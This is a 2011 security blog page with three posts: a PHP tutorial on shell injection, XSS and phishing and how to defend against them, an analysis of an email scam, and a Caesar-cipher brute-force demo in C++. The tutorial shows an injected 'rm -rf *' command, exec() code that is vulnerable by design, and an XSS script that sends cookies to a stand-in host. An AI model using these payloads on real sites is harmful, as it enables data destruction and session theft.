Wednesday, June 29, 2011

Attacking, Authentication, and Access Control

Introduction
It's a growing trend that as more and more services are placed on-line, we rely more and more on entering our data into what we trust as being secure web-forms. Has it ever crossed our minds though, that we enter all our information into web forms almost daily -- assuming that no one else will have access to such information. In what can be likened to the Wild West, there can't be any room for complacency on the internet. It's this idea of complacency that plays a major role in why authentication and access control measures have become so important. In this article we will look at three potential attacks that can be mounted against web forms and how they can be avoided using the PHP programming language -- executing shell commands, cross-site scripting, and phishing. Similarly, we will discuss the counter measures that can be used to avoid being hit by such attacks.

"Forming" the Attack
The first attack we are going to discuss is the use of passing shell commands in web-forms. For the most part, this is only possible when using the exec() or system() functions in PHP. These functions -- simply put -- allow developers or users to pass and execute shell commands from the command line through PHP. More so, these functions don't check what is being passed to them, they simply execute the commands they are given. For example if we were to use an exec() function to pass something to the command line -- a value of sorts -- it would be possible to append an extra command at the end -- assuming the site wasn't validating user input of course as we will see how this works shortly. Doing so would make a seemingly innocent application, most likely written out of convenience, into an attacker's tool capable of doing untold damage to the files on your server. In listing 1 we see the code that could be used to accomplish such an attack.

                         [Figure 1: Passing rm shell command to exec() function]
As we can see, the corresponding value for the form is entered "as usual" -- however -- the "rm -rf *" shell command was also appended to the end. In doing so, the attacker has now successfully deleted every file within the directory that houses the PHP script containing the exec() function. Having viewed an image of how the attack might take place, let's look at the code in order to understand its "under the hood" aspects.

[Listing1: HTML form code]
<html>
        <head>
                <title>A Simple HTML Form</title>
        </head>
        <body>
                <form action="" method="">
                        <table border="0">
                                <tr><td>Enter value:<input type="text" name="value" /></td></tr>
                                <tr><td><input type="submit" value="Enter" /></td></tr>
                        </table>
                </form>
        </body>
</html>

[Listing 2: PHP process code]
<?php
$getValue = $_POST["value"];
exec("usr/bin/some_command_line_app" . $getValue);
?>

Looking at the previously listed code, it's obvious that if this were an actual program or a perfect world nothing would seem out of place. We are writing a simple web-form, the processing code in PHP, and using an exec() function to pass a value to the command line. As we are not in a perfect world, the problem begins when we don't "sanitize" the user's input. Such a simple action can lead to pretty hefty consequences as was just demonstrated. Yet this said, there are some steps that can be taken to avoid such malicious shell commands from being executed through your web-forms.

Moving from malicious shell commands to malicious code, cross-site scripting is the next attack we will be looking at. In this case, the attacker is entering malicious code into a web-form within a website in order to get unintended results. One reason why cross site scripting is such a growing attack vector is because of it's ability to steal cookies. In doing so, the attacker is then capable of stealing login information including usernames and passwords. Considering this possibility, let's assume that the attacker was able to find a website that was vulnerable to cross site scripting attacks. The attacker would then pass malicious code similar to what we see in listing 3.

[Listing 3: Malicious Cross Site Scripting Code]
<script>
document.location =
"http://www.fakesite.com/cookiestealer.php?cookie=" + document.cookie;
</script>

The code in listing 3 would essentially pass cookie data to a fake website and PHP script capable of logging all of the cookies' contents -- most likely to a database or text file of sorts. Remembering the fact that we are talking about a website that is not validating user input into its web-form, this is a major problem. Having such information means that the attacker is now capable of masquerading as any of the now victims who had their information stollen. This also gives the attacker the ability to have added access to the website seeing as how he or she is now able to log in which subsequently means they can now deface the website more easily

The code in listing 3 would essentially pass cookie data to a fake website and PHP script capable of logging all of the cookies' contents -- most likely to a database or text file of sorts. Remembering the fact that we are talking about a website that is not validating user input into its web-form, this is a major problem. Having such information means that the attacker is now capable of masquerading as any of the now victims who had their information stollen. This also gives the attacker the ability to have added access to the website seeing as how he or she is now able to log in which subsequently means they can now deface the website more easily.

Finally, we have the phishing attack. Phishing attacks are different from the previously mentioned attacks in that they victimize a website by maintaining similar HTML and CSS formatting but use a completely different PHP script -- for example. Basically, this allows the attacker to use the PHP language against itself in that he or she is able to get the same values from the form, but use the script for the purposes of storing the now stollen information usually in a database, text file, or to simply email it all back to the attacker. The danger of such an attack increases though, because the front end of the victimized website is pretty much exactly the same as the legitimate version meaning that users have a harder time telling the difference.

Countering The Attacker
We've looked at the attacks, we gone through the code, now the time has come to discuss the counter measures to be used so as to avoid these kinds of attacks. Let's first consider an attack using malicious shell commands. In order to stop this kind of attack we have to use a couple of PHP functions -- esecapeshellarg() and esecapeshellcmd(). Looking at the escpaseshellarg() function first, this function essentially delimits arguments passed to it with single quotes but also escapes quotes that might be present within the string argument itself.

This function ensures that when arguments are passed to the function, they are converted into a single argument. In doing so, we are more able to prevent malicious shell commands from being appended to the end of any arguments being passed to exec() or system(). A similar function -- escapeshellcmd() -- works by dealing with shell program names rather than shell arguments and escapes shell meta-characters that might be found in the argument. So to reconsider our malicious input from figure 1, the escapeshellcmd() function would escape the ; and * characters respectively which would in turn render the entire argument useless as it wouldn't make sense to the command line.

Let's now shift our focus to that of cross-site scripting. Seeing as how we are inputting malicious code into web-forms that can contain tags of some sort, there are two functions that can be used to avoid HTML tags being executed by the browser -- htmlentities() and strip_tags(). The htmlentities() function will basically convert characters that have meaning in HTML -- < and > for example. If we return to our cross-site scripting example and happened to have passed the attacker's input into the htmlentites() function, the <script> tags would have been converted as "&lt;scriptgt;" instead. Thus the attacker's code would now no longer function as he or she would expect it to. But because we can't assume that simply rendering HTML tags useless is enough to stop a more enterprising attacker, the strip_tags() function takes it a step further. Instead of converting characters, the strip_tags() function does what its namesake suggests, it removes HTML tags completely from the attacker's input.

And as we finally turn our attention to phishing attacks, it should be pointed out that there is no single function with which protection can be granted. The problem with phishing attacks is that similar, if not the same, HTML code is used to trick the user into thinking that they are navigating to the same website while an entirely different PHP script is used to essentially steal the user's personal information. On that note though, it's possible for the attacker to use cross-site scripting in order to re-direct the user to the victimized website where the attacker can then steal their information. This means that it's quite possible to stop one attack while avoiding another as would be the case with guarding against cross-site scripting in order to protect against phishing.

Yet, considering the fact that attackers are growing in technical complexity, it has become the job of the developer to secure his or her website in a way that doesn't allow their user's information to be compromised. Using the techniques we discussed above will be a start in the right direction, but it comes down to strong development practices in the use of supplied PHP functions, encryption, and especially education towards the website's users. Development practices won't mean a thing the second the user clicks on the bogus link in the first place. While developing more secure PHP scripts is one half of the process, ensuring the user understands the dangers of phishing attacks and the policies of the company is the other. What this means is that it needs to be made clear that the company will never send out emails requesting personal information from its users.

Conclusions
All of the above mentioned attacks are just the tip of the iceberg. We face an internet where attacks and their attackers grow in sophistication almost daily. With the threat of malicious code not disappearing any time soon, we have to use the tools and best practices afforded to us in order to avoid becoming the next statistic. After all, if we are going to continue "converting" our lives to digital and internet integrated then securing the internet -- especially the web-forms we use -- is an inevitable necessity.

Wednesday, May 4, 2011

Analysis of A Scam

Introduction

It's all to often that we hear about being scammed on the internet especially when using Craigslist – the popular website for selling and buying almost anything on the internet.  But it seems as though the majority of the website has become devoted to messages warning us of the potential for getting scammed.  Recently, I received multiple such emails and one of them was quite believable.  Because there is such a high possibility that we will end up dealing with email scams in the course of our internet use, this article is devoted to the analysis and steps necessary to determining whether or not you should even waste your time replying.  We will start by analyzing the content of such emails and will end with pointing out just where to look in the email's header in order to determine the originating IP address and subsequent physical location of that IP address. 

Off to the Sp3ll!ng B33

For the most part, the easiest way to tell whether or not an email is worth actually reading is by looking for some obvious details.  These details include the email's formatting, spelling, grammatical usage, and punctuation.  Figure 1 shows a portion of one of the emails I received. 

                 Figure 1: The story

The text in figure 1 is peppered with errors of all kinds.  Notice that some words are capitalized  while others are not at the start of each sentence.  Also notice that some of the words are not even the right word or word tense.  If you attempt to read it all the way through, the text really doesn't make much sense and you have to ask yourself the question, why would someone be attempting to rent an apartment from another country without going through a broker or real estate agent. 

Figure 2 lists the actual information that the “landlord” needs in order to determine our ability to rent the apartment.  Yet while the information seems standard, most real estate agents don't ask the question “Are you Married?” 

                 Figure 2: The information
Furthermore, looking at the information we are being asked to supply, it's obvious that the scammer is attempting to indirectly gather identity information.  Worse yet, questions six and seven could be used as recovery questions for passwords.  This is where it becomes dangerous to reply to these emails, especially if you are new to experiencing scams.  For example, if you happened to reply to the email with all your personal information without asking the question “why?,” you have potentially put the  security of your identity, usernames, and passwords at risk. 

Having looked at an email that resembles an obvious scam, let's now turn our attention to an email that is a little more believable. 

                            Figure 3: A more believable approach

In figure 3 the first indicator is that it's written with better English in that there are not as many glaring errors.  The scammer is also attempting to let the reader know why they didn't respond right away.  Moving on, figure 4 shows what could be considered the core of the email. 

                 Figure 4: A more believable story   

Taking Steps To Protect Yourself  

Dealing with just the email is not always a clear indication as to whether or not your dealing with a scam, simply because a well designed website is all you need to disguise a phishing attack.  But that being the case, there is one piece of information that can be used to make a determination once and for all about what your dealing with, that's the originating IP address of the email.  To figure this out, we have to dig deeper into the email and track it down through the email's header information. 
 
                     Figure 5: Email header information
Received: from zap-server (***********@173.224.219.130 with login)

Figure 5 shows the originating IP address of the email and in order to find this we need to look for the very last IP address which tends to be closest to the bottom of the header information.  To do so simply click on “Actions” and then “View Full Header” if you are using Yahoo! Mail or click the down arrow in the upper right hand corner of the email and then “Show original” if using Gmail.  Now that we have obtained the originating IP address we can use a website to trace it back its physical location.  There are many websites that can be used to do this but for demonstration purposes we have used ip-adress.com.

Figure 6 shows the end result of our trace as well as the originating destination of the IP address.

                           Figure 6:  Tracing results 



Looking at the output in figure 6 we see that the email originated from Western Africa and most likely Nigeria or the like.  Knowing this information, we can now make better decisions as to whether or not we should supply our personal information or even bother replying to the email.

Conclusions
 
As is usually the case, the best way to prevent such attacks is to avoid giving out your personal details in the first place.  It should also be noted that you are almost never asked for personal data through email.  If you should be asked for personal information make sure to verify with the person who is asking for your information before filling out any web forms or submitting attached “rental applications.”  And if it happens that the email looks plausible, take the time to track down it's originating IP address and check where the email actually came from.  Following the analysis we went through as well as the steps to tracing the email's original location will help you avoid having your identity stollen and will add a layer of protection to your personal information.

Sunday, May 1, 2011

Breaking The Code: Brute Forcing The Encryption Key

Introduction

There's no way around it, cryptography is an aspect of our digital lives that's becoming more and more prevalent. It's because we interact in a vast social network that is the internet where we enter our personal information into countless profile pages and make the majority of our purchases online that we have an increasing need to focus on cyber security and cryptography. But at the same time that cryptography has great potential in securing our information, it's just as vulnerable to attack.

In order to illustrate the points set forth by the author, we will be focusing on a single encryption cipher – the simple-substitution cipher. We will demonstrate software implemented for the purposes of encrypting, decrypting, but also breaking such encryption. As a result, the knowledge imparted through this article can and should be used as a stepping stone towards re-thinking cryptography and how we use it to secure information.

Cipher Basics

The simple substitution cipher – generally considered weak encryption – was known for offering a relatively secure means of hiding information back when it was first introduced. This style of encryption worked by – as it's name states – shifting the clear text a certain number of positions right or left of the original character. We refer to this shift value as the encryption key. For example, the letter A shifted four spaces to the right gives us the letter E. Using this method, we could shift all the letters of the English alphabet four spaces to create what's called a cipher alphabet. This cipher alphabet could then be used to encrypt longer pieces of information.

We will be using a variant of the simple-substitution cipher in that we don't limit the encryption key to 25 (because we start counting from 0 in C++) but rather allow the shift to occur past the 26th letter of the alphabet. This will become clearer as the encryption and decryption algorithms are explained in the following section. Within a computer, each character is referenced by a number, this number is referred to as the character's ASCII value. To encrypt each character we need to use its ASCII value so we know from where in the alphabet the shift needs to occur. So to look at our previous example, the ASCII value of A is 65 and when shifted 4 spaces becomes 69 or E; figures 1 and 2 demonstrate this more mathematically.

Figure 1: Calculating Cipher Text
X = (O + K)
where:
X is the encrypted letter
O is the original letter
K is the encryption key

Figure 2: Calculating Cipher Text in Practice
69 or E = (A + 4) or (65 + 4)
where:
E is the encrypted letter
A is the original letter
4 is the encryption key

Understanding the Algorithms

It's time to put our theory into practice, listing 1 shows the encryption algorithm we wrote for the demonstration software. In order to encrypt the clear text we need to loop through the entire string and process each character one by one. The for loop starts by grabbing the first character of the clear text, converting to its ASCII value and shifting to the value of the encryption key. Once the character has been shifted, the encrypted value is then converted back to a character and concatenated to a string variable that will store the encrypted text.

The algorithm continues to execute until the end of the clear text at which point the loop exits and we are left with the encrypted text printed to the screen. As previously mentioned, the decryption algorithm works just like its encryption counter part except everything is reversed. Instead we loop over the encrypted text and subtract the encryption key from the encrypted character's ASCII value to once again recover the clear text, much like we saw in the previous section. The decryption algorithm is documented in listing 2.

Listing 1: Encryption Algorithm
for (int i = 0; i <= clearText.length; i++)
{
    currentChar = clearText[i];
    currentInt = int(currentChar);
    encryptedInt = currentInt + encryptionKey;
    encryptedChar = char(encryptedInt);
    encryptedText += encryptedChar;
}

Listing 2: Decryption Algorithm
for (int i = 0; i <= encryptedText.length; i++)
{
    currentChar = encryptedText[i];
    currentInt = int(currentChar);
    clearInt = currentInt - encryptionKey;
    clearChar = char(clearInt);
    cleartext += clearChar;
}

Following is a sample run of the encryption and decryption algorithms. Listing 3 shows how the message “the quick brown dog” gets encrypted and listing 4, the decryption. Taking a closer look at the encrypted text we see that the word length is not reflected or is more difficult to visualize when encrypted as opposed to when looking at normal English. Consider this example from a more cryptanalytic perspective for a moment. If this were the only text we had to work with, a red flag already has to be raised. Because there are multiple instances of the dollar sign in the encrypted text, we can assume that this character represents a letter in the original text or another widely used character. But just by looking at the ratio of the dollar sign to the other encrypted characters, we know that it doesn't represent a letter, mainly because the dollar sign's ASCII value is greater than any of the “A” to “Z” or “a” to “z” characters. Knowing this, it's a safe bet to assume that the dollar sign represents a space. And subsequently, we can now gain a better idea of where the word lengths occur in the example. While we have now entered into the realm of frequency analysis, it's good to point these things out as the simple-substitution cipher wears its flaws for public display.

                 Listing 3: Encrypting A Message


                 Listing 4: Encrypting A Message


Algorithmic Attacks
Our previous discussions have centered around the fact that we knew the encryption key. Most likely, that will not be the case and we will only have the encrypted message to work with.
When this is the case, there are a couple of attacks we can use. One – and the most widely used – is frequency analysis as we previously alluded to, the other is brute force. Now while it's not our goal to discuss how to use frequency analysis to break encryption, the process basically requires that we find the frequency of the characters used in the encrypted text along with the characters used in the clear text's language – this is usually English.

The second attack and the one we are going to learn how to use is brute force. In regard to the simple-substitution cipher, brute forcing simply involves using a range of numbers to test which one if any is the encryption key. We do this process until the encryption key is found and/or we are able to decipher the encrypted message. The brute forcing algorithm is described in listing 5.
Much like the algorithms we previously looked at, this algorithm also loops over the encrypted text only instead of using a known encryption key, the algorithm takes a number from the user to use as a range starting from 0.

Listing 5: Brute forcing algorithm
for (int i = minRange; i <= encryptedText.length; i++)
{
    for each (char currentChar in encryptedText)
    {
        currentASCII = int(currentChar);
        clearASCII = currentASCII - i;
        clearChar = char(clearASCII);
        clearText += clearChar;
    }

    cout << clearText << endl;
}

You'll also notice that we are also using a set of loops in this algorithm as opposed to before where we only needed one. Reason being, the outer loop is giving us the potential encryption key while the inner loop is using the potential encryption key on the encrypted text. Once execution reaches the inner loop, it works much like our decryption algorithm in that we are still processing character by character but the difference is that we are storing each potentially decrypted message in a string array. Lastly the outer loop prints out each index of the string array to the console window for viewing.

Listing 6 shows a sample run using the same example as before. The list format makes it easier to determine which index contains the decrypted message.

                 Listing 6: Brute forcing in action


If on running the program, the range of numbers does not turn up the decrypted text, simply increase the number previously entered and re-run the program. This process can be repeated as often as needed until the deciphered message is displayed in the list. It's by writing such software that we don't have to concern ourselves with trying each number on it's own and can more easily break the encryption.

So What?

Why care about anything we just talked about? Similarly, it's also apparent that in order to demonstrate the process of breaking encryption, we used an obviously outdated algorithm. The point to all this though is the fact that software can be written as a tool for use in cryptanalysis and ultimately the breaking of encryption. Once a software tool is written that is capable of breaking encryption, the amount of time it would theoretically require to break the cipher leaves little in the way of an acceptable deterrent. This is the case because the rise of bot nets and super-computers substantially raises the potential processing power one has to work with and as a result, the greater the processing power, the smaller the amount of time to break the encryption.

So where are we to look to find a solution to the problem? Because we face a cyclical cycle of constantly developing newer technologies to secure information, there is no clear cut solution. As we push forward into the future of information security, it's best that we do away with the oldest of encryption algorithms – merely to keep them around for theoretical purposes – and focus on those that yield the best possible strength for the current security conditions. Finally, we must not forget that the truest sense of security comes down to our treatment of the encryption key. For the advancement of cryptography is inevitable but the person in control of the keys to such systems is not.